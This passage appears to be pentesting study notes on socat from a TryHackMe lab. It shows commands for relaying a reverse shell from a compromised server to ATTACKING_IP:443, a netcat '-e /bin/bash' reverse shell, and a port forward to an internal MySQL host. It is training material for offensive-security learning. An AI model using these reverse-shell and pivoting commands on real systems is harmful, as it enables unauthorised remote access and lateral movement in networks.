is a tool often used for a really stable linux shell, but it’s also good for port forwarding. It is not often installed by default yet a lot of binaries exists (cf gentil kiwi).
Socat create encrypted connections for shell, see the room bellow for more info.
TryHackMe | Cyber Security Training
Socat can be used as a relay to listen for the reverse shell from the target and then forward it immediately back to the attacking box.
Start a netcat listener with nc -lvnp 443 on the attacker machine and start the relay on the compromised server.
./socat tcp-l:8000 tcp:ATTACKING_IP:443 &
tcp-l:8000 is used to create the first half of the connection -- an IPv4 listener on tcp port 8000 of the target machine.tcp:ATTACKING_IP:443 connects back to our local IP on port 443. The ATTACKING_IP obviously needs to be filled in correctly for this to work.& backgrounds the listener, turning it into a job so that we can still use the shell to execute other commands.<aside> 💡 Note: the order of the two addresses matters here. Make sure to open the listening port first, then connect back to the attacking machine.
</aside>
We can now start a netcat reverse shell on port 8000 (with a static version of netcat).
nc 127.0.0.1 8000 -e /bin/bash
The quick and easy way to set up a port forward with socat is quite simply to open up a listening port on the compromised server and redirect whatever comes into it to the target server.
./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &
fork option is used to put every connection into a new process